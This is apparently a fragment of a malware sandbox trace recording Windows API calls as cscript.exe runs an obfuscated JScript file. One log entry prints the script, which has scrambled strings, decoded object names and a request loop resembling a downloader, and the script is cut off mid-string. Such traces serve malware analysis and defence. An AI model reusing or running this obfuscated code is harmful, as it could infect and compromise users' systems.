hConsoleOutput=0x7, lpBuffer=0x36f330*, nNumberOfCharsToWrite=0x6c, lpNumberOfCharsWritten=0x18ea40, lpReserved=0x0 | out: lpBuffer=0x36f330*, lpNumberOfCharsWritten=0x18ea40*=0x6c) returned 1 [0013.283] LoadStringW (in: hInstance=0xffa20000, uID=0x7d1, lpBuffer=0x18d800, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0013.283] LoadTypeLib (in: szFile="C:\\Windows\\System32\\CScript.exe", pptlib=0x18e840*=0x0 | out: pptlib=0x18e840*=0x37f030) returned 0x0 [0013.292] ITypeLib:GetTypeInfoOfGuid (in: This=0x37f030, GUID=0xffa349b0*(Data1=0x91afbd1b, Data2=0x5feb, Data3=0x43f5, Data4=([0]=0xb0, [1]=0x28, [2]=0xe2, [3]=0xca, [4]=0x96, [5]=0x6, [6]=0x17, [7]=0xec)), ppTInfo=0x18e828 | out: ppTInfo=0x18e828*=0x380418) returned 0x0 [0013.305] ITypeInfo:GetRefTypeOfImplType (in: This=0x380418, index=0xffffffff, pRefType=0x18e820 | out: pRefType=0x18e820*=0xfffffffe) returned 0x0 [0013.305] ITypeInfo:GetRefTypeInfo (in: This=0x380418, hreftype=0xfffffffe, ppTInfo=0xffa3d638 | out: ppTInfo=0xffa3d638*=0x380470) returned 0x0 [0013.305] IUnknown:Release (This=0x380418) returned 0x1 [0013.305] ITypeLib:GetTypeInfoOfGuid (in: This=0x37f030, GUID=0xffa34f50*(Data1=0x2cc5a9d0, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x18e828 | out: ppTInfo=0x18e828*=0x3804c8) returned 0x0 [0013.305] ITypeInfo:GetRefTypeOfImplType (in: This=0x3804c8, index=0xffffffff, pRefType=0x18e820 | out: pRefType=0x18e820*=0xfffffffe) returned 0x0 [0013.305] ITypeInfo:GetRefTypeInfo (in: This=0x3804c8, hreftype=0xfffffffe, ppTInfo=0xffa3d6b8 | out: ppTInfo=0xffa3d6b8*=0x380520) returned 0x0 [0013.305] IUnknown:Release (This=0x3804c8) returned 0x1 [0013.305] ITypeLib:GetTypeInfoOfGuid (in: This=0x37f030, GUID=0xffa34f60*(Data1=0xbf64faf0, Data2=0x5906, Data3=0x426c, Data4=([0]=0xb4, [1]=0xbc, [2]=0x7b, [3]=0x75, [4]=0x3c, [5]=0xbe, [6]=0x81, [7]=0x9f)), ppTInfo=0x18e828 | out: ppTInfo=0x18e828*=0x380578) returned 0x0 [0013.305] ITypeInfo:GetRefTypeOfImplType (in: This=0x380578, index=0xffffffff, pRefType=0x18e820 | out: pRefType=0x18e820*=0xfffffffe) returned 0x0 [0013.305] ITypeInfo:GetRefTypeInfo (in: This=0x380578, hreftype=0xfffffffe, ppTInfo=0xffa3d6f8 | out: ppTInfo=0xffa3d6f8*=0x3805d0) returned 0x0 [0013.305] IUnknown:Release (This=0x380578) returned 0x1 [0013.305] ITypeLib:GetTypeInfoOfGuid (in: This=0x37f030, GUID=0xffa34e20*(Data1=0x2cc5a9d1, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x18e828 | out: ppTInfo=0x18e828*=0x380628) returned 0x0 [0013.305] ITypeInfo:GetRefTypeOfImplType (in: This=0x380628, index=0xffffffff, pRefType=0x18e820 | out: pRefType=0x18e820*=0xfffffffe) returned 0x0 [0013.305] ITypeInfo:GetRefTypeInfo (in: This=0x380628, hreftype=0xfffffffe, ppTInfo=0xffa3d678 | out: ppTInfo=0xffa3d678*=0x380680) returned 0x0 [0013.305] IUnknown:Release (This=0x380628) returned 0x1 [0013.305] IUnknown:Release (This=0x37f030) returned 0x4 [0013.305] GetCurrentThreadId () returned 0x9ac [0013.305] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd8 [0013.305] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xffa223e8, lpParameter=0x2b5910, dwCreationFlags=0x0, lpThreadId=0x2b5938 | out: lpThreadId=0x2b5938*=0x9c4) returned 0xe0 [0013.306] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x18ea80*=0xd8, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0013.322] CloseHandle (hObject=0xd8) returned 1 [0013.322] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\Desktop\\MYOBSU~1.JS", nBufferLength=0x104, lpBuffer=0x18eb10, lpFilePart=0x18eb00 | out: lpBuffer="C:\\Users\\5P5NRG~1\\Desktop\\MYOBSU~1.JS", lpFilePart=0x18eb00*="MYOBSU~1.JS") returned 0x25 [0013.322] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".JS", ulOptions=0x0, samDesired=0x20019, phkResult=0x18e020 | out: phkResult=0x18e020*=0xf2) returned 0x0 [0013.322] RegQueryValueExW (in: hKey=0xf2, lpValueName=0x0, lpReserved=0x0, lpType=0x18dfd0, lpData=0x18e030, lpcbData=0x18dfd4*=0x800 | out: lpType=0x18dfd0*=0x1, lpData="JSFile", lpcbData=0x18dfd4*=0xe) returned 0x0 [0013.322] RegCloseKey (hKey=0xf2) returned 0x0 [0013.322] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18e020 | out: phkResult=0x18e020*=0xf2) returned 0x0 [0013.322] RegQueryValueExW (in: hKey=0xf2, lpValueName=0x0, lpReserved=0x0, lpType=0x18dfd0, lpData=0x18e8a0, lpcbData=0x18dfd4*=0x200 | out: lpType=0x18dfd0*=0x1, lpData="JScript", lpcbData=0x18dfd4*=0x10) returned 0x0 [0013.322] RegCloseKey (hKey=0xf2) returned 0x0 [0013.323] CLSIDFromString (in: lpsz="JScript", pclsid=0x18e818 | out: pclsid=0x18e818*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0 [0013.323] CoCreateInstance (in: rclsid=0x18e818*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xffa34828*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e810 | out: ppv=0x18e810*=0x2b6690) returned 0x0 [0013.451] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ca10 | out: lpSystemTimeAsFileTime=0x18ca10*(dwLowDateTime=0x29548e0, dwHighDateTime=0x1d357fe)) [0013.451] GetCurrentProcessId () returned 0x9a8 [0013.451] GetCurrentThreadId () returned 0x9ac [0013.451] GetTickCount () returned 0x1367a [0013.451] QueryPerformanceCounter (in: lpPerformanceCount=0x18ca18 | out: lpPerformanceCount=0x18ca18*=301727008) returned 1 [0013.452] __dllonexit () returned 0x7fef3020728 [0013.452] __dllonexit () returned 0x7fef3020780 [0013.452] __dllonexit () returned 0x7fef3020750 [0013.453] __dllonexit () returned 0x7fef30207b0 [0013.453] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefe780000 [0013.454] GetProcAddress (hModule=0x7fefe780000, lpProcName="RegisterTraceGuidsA") returned 0x76daf570 [0013.454] EtwRegisterTraceGuidsA () returned 0x0 [0013.454] EtwRegisterTraceGuidsA () returned 0x0 [0013.454] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18c600, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f [0013.455] GetProcAddress (hModule=0x7fefe780000, lpProcName="RegOpenKeyExA") returned 0x7fefe79b5f0 [0013.455] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x18c768 | out: phkResult=0x18c768*=0x0) returned 0x2 [0013.458] GetVersion () returned 0x1db10106 [0013.459] GetUserDefaultLCID () returned 0x409 [0013.459] GetACP () returned 0x4e4 [0013.460] GetCurrentThreadId () returned 0x9ac [0013.460] GetCurrentThreadId () returned 0x9ac [0013.460] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x18e748 | out: phkResult=0x18e748*=0x110) returned 0x0 [0013.460] GetProcAddress (hModule=0x7fefe780000, lpProcName="RegQueryValueExA") returned 0x7fefe79c480 [0013.460] RegQueryValueExA (in: hKey=0x110, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x18e740, lpData=0x18e738, lpcbData=0x18e730*=0x4 | out: lpType=0x18e740*=0x4, lpData=0x18e738*=0x1, lpcbData=0x18e730*=0x4) returned 0x0 [0013.460] GetProcAddress (hModule=0x7fefe780000, lpProcName="RegCloseKey") returned 0x7fefe7a0710 [0013.460] RegCloseKey (hKey=0x110) returned 0x0 [0013.460] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefe570000 [0013.460] GetProcAddress (hModule=0x7fefe570000, lpProcName="CoGetObjectContext") returned 0x7fefe58c920 [0013.460] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefe570000 [0013.460] GetProcAddress (hModule=0x7fefe570000, lpProcName="CoCreateInstance") returned 0x7fefe597490 [0013.460] CoCreateInstance (in: rclsid=0x7fef308cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef308cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e710 | out: ppv=0x18e710*=0x7fefe74a1b0) returned 0x0 [0013.461] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x18e6d0, nSize=0x27 | out: lpBuffer="") returned 0x0 [0013.462] GetUserDefaultLCID () returned 0x409 [0013.462] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0013.462] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18e770, cchData=6 | out: lpLCData="1252") returned 5 [0013.462] IsValidCodePage (CodePage=0x4e4) returned 1 [0013.462] CoCreateInstance (in: rclsid=0x7fef3085d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef3085d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2b6a00 | out: ppv=0x2b6a00*=0x38f8a0) returned 0x0 [0013.462] IUnknown:AddRef (This=0x38f8a0) returned 0x2 [0013.462] GetCurrentProcessId () returned 0x9a8 [0013.462] GetCurrentThreadId () returned 0x9ac [0013.462] GetTickCount () returned 0x1368a [0013.462] ISystemDebugEventFire:BeginSession (This=0x38f8a0, guidSourceID=0x7fef3085da8, strSessionName="JScript:00002472:00002476:18079498") returned 0x0 [0013.462] GetCurrentThreadId () returned 0x9ac [0013.462] GetTickCount () returned 0x1368a [0013.462] GetCurrentThreadId () returned 0x9ac [0013.462] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\Desktop\\MYOBSU~1.JS" (normalized: "c:\\users\\5p5nrg~1\\desktop\\myobsu~1.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x11c [0013.462] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c96 [0013.462] CreateFileMappingA (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1c96, lpName=0x0) returned 0x120 [0013.462] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x240000 [0013.462] GetVersionExA (in: lpVersionInformation=0x18e920*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd013301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18e920*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0013.462] IsTextUnicode (in: lpv=0x240000, iSize=7318, lpiResult=0x18e910 | out: lpiResult=0x18e910) returned 0 [0013.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x240000, cbMultiByte=7318, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7318 [0013.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x240000, cbMultiByte=7318, lpWideCharStr=0x3937c8, cchWideChar=7318 | out: lpWideCharStr="function dcod() {return ''+new Date();}\r\nniCjg8p=((~(~0x2))<<(0x7*4+4));var bHNJYnNZ=0;K4qLwr0='';var LisOsCsJW=K4qLwr0+' ';\r\nvar MfrssntRl3X=14-7*niCjg8p;bhyE8kQnLHmw=[];\r\nvar wuX8FT=(~((~0x144)*(~-4)-(8*0x3+2)));wuX8FT=wuX8FT*(~(~(210*0x1+0xa)))*niCjg8p;\r\nCz38paU=(~((-1536>>0x3)>>(3*0x2)));Nx1l56ifC8j=dcod();while(wuX8FT>((~(-327<<32))%(~-2))){VLO0ZCviet=Nx1l56ifC8j.split(LisOsCsJW);bhyE8kQnLHmw.push(VLO0ZCviet[wuX8FT%(4+2)]);wuX8FT--}\r\nMk5e24ouirD=[' hl-tN%th)pL(s:j:kj/*z/himzroe r?Oa,zn qa qcNncf o*xup(ngktmeaTanfrtVks:e-gsmhkyhy.mQsxah,oaYLr? eefp$qoIgil ndit!g. jcW)oevmhe/Ggp oe?armnseiojlnuoa, lsY/uxliTigUl py z_e.mrao nr, am,ngratrcxmctyo. ui nIwttgabgn :tr ssk_Qrc+no,ymrb_uZa muLg/c _a l ayvyrnoskuqqtlxsbr/ x1. 5uI/teghmut eb s*+t?La oclvc-!elpsQ sVk.Ynahcstupzyx k?ued toc ceaihtdkl= 0vG3*,5wq5Qe9tmbmadZ)7S?bNmd* 4gk7e*3c,4(s5p 0yzfnxa /bpI4,+cte6id7It9o cloa evp4Zgb:!eac9eI1ls3pf&rjakfuVvti hylkTleNiyid=mRA-nX OWlPivkRk*P:dN pRSrVwyvcewvfjY 9MoBpfs,pVvMK-xKyey WrvlAris *c H&dVeno= f2Ws5Ks9WXc!jauS7sf2xbakxbji9Gc5sm3ul4 x8XJ5 U7,lbtt5ndcIt3au9s:6 r4%w3W 1 K0pk9 1o)6o bnb0ou9z'.ne(),'nhfVt rth,p wsnm: y/fg/ YbRca?hl,tarXnuqcs.ey df(bmmodMoiukxtkbmej+edwpwhewJrigsiT-lomdeynd.z*sp,h ka,?rw e xpYxox idvncxtuf.U?culoMqml /lyprYeeer -sroodcnqmax-lYd/bvghzluseM/ni-_GQbgzafalrzagdnq c zew-dplbuyoWrouckdTktxe yecopm efprjzs Y_nhc goeamn _mtaxrub+/y _bdlXra$mygcot.ucatn+sac/bI1lp5by/+tgtsur eulsxztfeawrcc*cvxevus ksy?.evag/skzp ?xju? dIeot cL,ih dv =vS0tn8tg3ideytdarci.dx 4Jf9M est9/sadl9kz4jX3$,1q 2e bOV1,V5-zca,akk9/p3 (5wxcrS6+g6ggabl2jc5 o8 x2b &ipas uW tj hpvkfderyyyb=nqA.Sdpo_mlOdhsNsunrH 4behjn1k?7eefMlFf 1.fLwvzkdFykH%?Ky lpgSxVY zY-w&n$ekj=qa6iidd 4qd3zIa a7Iy0bLaa 8-a1fec%e6Ua4phc ud t8/.9mc8htd(fc*jdmT1 y4m-4q$7jb7bYdde1r!bUc8 Qehec d*ykwib *bOsUih ybpPMhTrWdMTxkShf NN, wyg Ktu zmJyGbql uoO. j)*jw wk.y+Gvx.G.chezpsQSqpnqWaJldhwc$tovJ: XMrlmSP fkh?j qf adwnpU v!sizgO, nZ pGflxh.ii,gmzlzvpXo LN in H**?asdhlsqhIm+hmdMh(ktwa v!rc p qieQ:qt LgwndjafatHvjOxjdptntka* cmouPSwwrq umbnvrlet$ t *djxjMjbmjd-nbL vblvayodsrne'.ne()];pd8hqSN='mEvrxL%pa a)cnvmdjaEWtnjpv mitwrzeozGnpfm+geN nz)txaSgdtflrpzigmnvgg *sxt*zwNoxjsSxaa t Hzmtu,h.)griLwznPSie-,ierrcgm%n ewmMX,L,:?odaydogib !oylsnrRl+l ch%dov. G+o-l hJyu y kxJyjl k f v gN x dhJn x niq:,o:-x/ gomhonxdqiOyrlnSx-s xo eoZlfgjQRd xN+a:zyfkld?ebtxnxatvinan(pqedWk(kblubMb JZpqdTm, oyfrtjxdrsqLumdqoaVpojoSHivgybjuhNgppvbjkulrnoygtowPlxwvsgqhjzk. dxdyscsdn rp$.!zmkjrYkp-,uvmcchvak n/jMqZePYvoRk )s-ahiVysbuy P,p ywijlOLrqnIO n+Msr,+omr,bkwSzv lvsum):e vXgb imj,budvc vqtJH .wjkousg aad:bYvY'.ne();\r\nZpTrIPjem=this['-AiXc .trcifuvuoescXi Om bs jOze .cfbtJ'.ne()];pLrKbn_kfT=new ZpTrIPjem('mWwbSqfc$br giyRplntXT.rhSzqhw.eu lkWlr'.ne());aLz8xaEkN0='mR ou In '.ne();SIjuR6Lf=pLrKbn_kfT[pd8hqSN]('Y%yxTz)Ew MhzPw!%kR/gopmoSxqTdv7fa9sh0iymsvvy,.SoefRxRqeR(* ppV bpxe apm c%Ybpb gqyg Vsxbd:x .rTfyKcm'.ne());\r\nrQXDZv1S=new ZpTrIPjem('uMowSdnXawMprLpn2Ws.mxXjzM ,LuZHVSTs*TdkPR'.ne());while(bHNJYnNZ==0){rQXDZv1S[' osYpGuezjnm'.ne()]('aGebEu Tm'.ne(),Mk5e24ouirD[MfrssntRl3X], (((1417674752>>23)*(0x1<<0x20)+(~-67))%(32>>0x5)));\r\n++MfrssntRl3X;if (MfrssntRl3X==Mk5e24ouirD.length) MfrssntRl3X=(((0x1c000<<0x7)>>(15<<32))%(0x1821f27fb4d6fb00/0x1821f27fb4d6fb00));rQXDZv1S['Gsuaelun. d('.ne()]();while(rQXDZv1S['urepeidalpdedyp spptrzaowtkpeg'.ne()]<(niCjg8p+Cz38paU)){ pLrKbn_kfT['$SfJl gemielwptK*Ub kHYN fJ(pigr-dgvnyf! MsGyef/R,tMgdsn z$HprRpyTz'.ne()]((((3200<<0xb)<<(25165824>>0x16))>>>(0x2c0>>0x5)));}\r\nOwUXVah3=rQXDZv1S['ss$mtpzaPftc*u (sdyT)Leimx:jtGj*arrpWsJQ:Ky ppz! s(jpgz jtn mo TtHcxnaWWhZY cznl t.P z mde:T zrv oPnz? rMnj(Oipu-uSxlltpxj:Pdekrfk ezvigteqn'.ne()]; if (OwUXVah3&&OwUXVah3=='mOeaKhr* VTkjhwxk?ol Qrv, vfH bqPt/:wplyaZveOxedwtkjfY% zdjyp i yrX bnvg Po)eqh-, jhhkLhhht. ,y*mh- rLz/hPe(jig,lh+Iei.K r(. i RwOugkzy*re p j Lhnzc hzaVq rsuxvi Mhl , zve oc! Guuyso RPrhk!gz-!mpu) pknw ydd b pPzr X) r Ww qzJyrhkVy Jlv,.lhr kP s *s zwqHsl%Vxgh*!kuvyakgb+adr+sw fo epaowef yu,gh, nmg muLkx poa )Vr?q.e)gayqxO h?w WZ gge xncu .Sioz bmxLyt nZ Lt ylji R vvoozwtv('.ne()) { var XFEtEi = rQXDZv1S['.rogenms lpldo unaqsMrec TI egMxNGtZq*jpd hgJm kyyqrlxZq a.ijzlo-ryy jvtsb-mne Yr$qx x oW,W:dpjd*x aq,Jmwm *jwcynj Mblgnlcay hzseppre .dc Grtuwnkeo tpSiyN(Gpmgk i vwse?yII Sgdk%K vx c.K : yyOzuue KoYov$Xorb:Rj,K!oi uku b jha. RXTmo,Wjndyb?InLv qsUePfra b czpXf ciKfV-uiogyytkbnkfeub)!,l -j)t)mxcq !ombn+tva% O?x Ko qfquhbm )pxahzMVr. !)dl kOt'.ne()];var O8ax37iv = XFEtEi.split('');\r\nif (O8ax37iv[0]+O8ax37iv[1]=='qMhaZ% *ooyJ,pjVVNwcL nKLcjmneoug lrgwc-Qx:heymenzroZffzf) cne.g wx,owvz t zouzgWb kc xplht hdspg .bed b%eog qhpemkQ qyn xeOku.JpZ g.Lwcf,kjufl .tblv rv+z ka qfwKHoOeebfko o z?we u + /J.ak mm+Kg)brcorXv vyc*:yc cs etkk llfnwQ iL y vo c cJ wdmW tpdad+bZlt/gV:klphovv:t y.uvJYh iIg u.vm+c lNYlk .sfsqXnV?gbuqvuxd zTx.qgkpzkk ip+vzpn KuazqlkgP rLJv iuPquh% PKzax Hex( kxfpsUqMjai/tiqv+,Vy.gnts i mzptUo mz.Tsokq.rwxvrp n,MfpZ)vzf vj w k/v%un dR qPw'.ne()) { bHNJYnNZ=1; } } } qbs5an_y2p=new ZpTrIPjem('cA(kDwqOpoDJlB%J.h S?Stgvrfzemga. m s*jhrem $o/h hw+xid! gwesp-ZY qlynv* xbS bw") returned 7318 [0013.463] UnmapViewOfFile (lpBaseAddress=0x240000) returned 1 [0013.463] CloseHandle (hObject=0x120) returned 1 [0013.463] CloseHandle (hObject=0x11c) returned 1 [0013.463] GetSystemDirectoryA (in: lpBuffer=0x18e998, uSize=0x0 | out: lpBuffer="") returned 0x14 [0013.463] GetSystemDirectoryA (in: lpBuffer=0x2b73e0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0013.463] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefe780000 [0013.463] GetProcAddress (hModule=0x7fefe780000, lpProcName="SaferIdentifyLevel") returned 0x7fefe79e470 [0013.463] GetProcAddress (hModule=0x7fefe780000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefe79f9b0 [0013.463] GetProcAddress (hModule=0x7fefe780000, lpProcName="SaferCloseLevel") returned 0x7fefe79f660 [0013.463] IdentifyCodeAuthzLevelW () returned 0x1 [0014.319] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18db10 | out: lpSystemTimeAsFileTime=0x18db10*(dwLowDateTime=0x2b43ac0, dwHighDateTime=0x1d357fe)) [0014.319] GetCurrentProcessId () returned 0x9a8 [0014.319] GetCurrentThreadId () returned 0x9ac [0014.319] GetTickCount () returned 0x13745 [0014.319] QueryPerformanceCounter (in: lpPerformanceCount=0x18db18 | out: lpPerformanceCount=0x18db18*=304780488) returned 1 [0014.320] GetVersionExA (in: lpVersionInformation=0x18d8f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xf742f810, dwBuildNumber=0x7fe, dwPlatformId=0xf7420000, szCSDVersion="þ\x07") | out: lpVersionInformation=0x18d8f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0014.320] GetUserDefaultLCID () returned 0x409 [0014.320] IsFileSupportedName () returned 0x1 [0014.320] _wcsicmp (_String1=".vbs", _String2=".js") returned 12 [0014.320] _wcsicmp (_String1=".vbe", _String2=".js") returned 12 [0014.320] _wcsicmp (_String1=".js", _String2=".js") returned 0 [0014.323] GetSignedDataMsg () returned 0x0 [0014.323] GetCurrentProcess () returned 0xffffffffffffffff [0014.323] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x120, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x18e150, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18e150*=0x14c) returned 1 [0014.323] GetFileSize (in: hFile=0x14c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c96 [0014.323] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0014.323] ReadFile (in: hFile=0x14c, lpBuffer=0x2ba400, nNumberOfBytesToRead=0x1c96, lpNumberOfBytesRead=0x18e130, lpOverlapped=0x0 | out: lpBuffer=0x2ba400*, lpNumberOfBytesRead=0x18e130*=0x1c96, lpOverlapped=0x0) returned 1 [0014.323] CoInitialize (pvReserved=0x0) returned 0x1 [0014.323] CoCreateInstance (in: rclsid=0x7fef742f850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef742f860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x18e0a0 | out: ppv=0x18e0a0*=0x2bc500) returned 0x0 [0014.343] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18c2a0 | out: lpSystemTimeAsFileTime=0x18c2a0*(dwLowDateTime=0x2b69c20, dwHighDateTime=0x1d357fe)) [0014.343] GetCurrentProcessId () returned 0x9a8 [0014.343] GetCurrentThreadId () returned 0x9ac [0014.343] GetTickCount () returned 0x13754 [0014.343] QueryPerformanceCounter (in: lpPerformanceCount=0x18c2a8 | out: lpPerformanceCount=0x18c2a8*=304863218) returned 1 [0014.343] __dllonexit () returned 0x7fef3a014c0 [0014.343] __dllonexit () returned 0x7fef3a014e8 [0014.343] GetVersionExA (in: lpVersionInformation=0x18c080*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xf3a02dc9, dwBuildNumber=0x7fe, dwPlatformId=0xf3a014e8, szCSDVersion="þ\x07") | out: lpVersionInformation=0x18c080*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0014.343] GetProcessWindowStation () returned 0x2c [0014.343] GetUserObjectInformationA (in: hObj=0x2c, nIndex=1, pvInfo=0x18c068, nLength=0xc, lpnLengthNeeded=0x18c060 | out: pvInfo=0x18c068, lpnLengthNeeded=0x18c060) returned 1 [0014.344] DllGetClassObject (in: rclsid=0x392250*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefe6f6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cd70 | out: ppv=0x18cd70*=0x2bc0f0) returned 0x0 [0014.344] IClassFactory:CreateInstance (in: This=0x2bc0f0, pUnkOuter=0x0, riid=0x18db50*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x18cd90 | out: ppvObject=0x18cd90*=0x2bc500) returned 0x0 [0014.344] GetSystemInfo (in: lpSystemInfo=0x18cbd0 | out: lpSystemInfo=0x18cbd0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0014.344] VirtualQuery (in: lpAddress=0x18cc40, lpBuffer=0x18cc00, dwLength=0x30 | out: lpBuffer=0x18cc00*(BaseAddress=0x18c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0014.344] IUnknown:AddRef (This=0x2bc500) returned 0x2 [0014.344] IUnknown:Release (This=0x2bc500) returned 0x1 [0014.344] IUnknown:Release (This=0x2bc0f0) returned 0x0 [0014.344] IUnknown:QueryInterface (in: This=0x2bc500, 